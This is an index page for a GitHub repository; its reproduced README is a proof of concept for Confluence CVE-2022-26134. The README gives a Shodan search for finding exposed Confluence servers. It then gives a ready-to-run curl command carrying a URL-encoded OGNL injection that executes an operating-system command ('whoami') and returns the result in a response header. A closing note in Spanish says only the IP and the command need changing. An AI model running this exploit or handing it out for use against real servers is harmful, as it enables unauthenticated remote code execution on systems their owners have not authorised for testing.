Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Y000o/Confluence-CVE-2022-26134
https://github.com/Y000o/Confluence-CVE-2022-26134
Last synced: about 1 month ago
JSON representation
- Host: GitHub
- URL: https://github.com/Y000o/Confluence-CVE-2022-26134
- Owner: Y000o
- Created: 2022-06-07T16:42:36.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2022-06-07T16:59:37.000Z (over 2 years ago)
- Last Synced: 2024-05-20T12:38:12.471Z (4 months ago)
- Size: 4.88 KB
- Stars: 5
- Watchers: 1
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - Y000o/Confluence-CVE-2022-26134 - (Others)
README
# Confluence-CVE-2022-26134
## dork en shodan
```
https://www.shodan.io/search?query=http.favicon.hash%3A-305179312&page=2
```
## Curl poc
```
curl -v http://10.0.0.247:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/
```
## Solo necesitas modificar la ip y el comando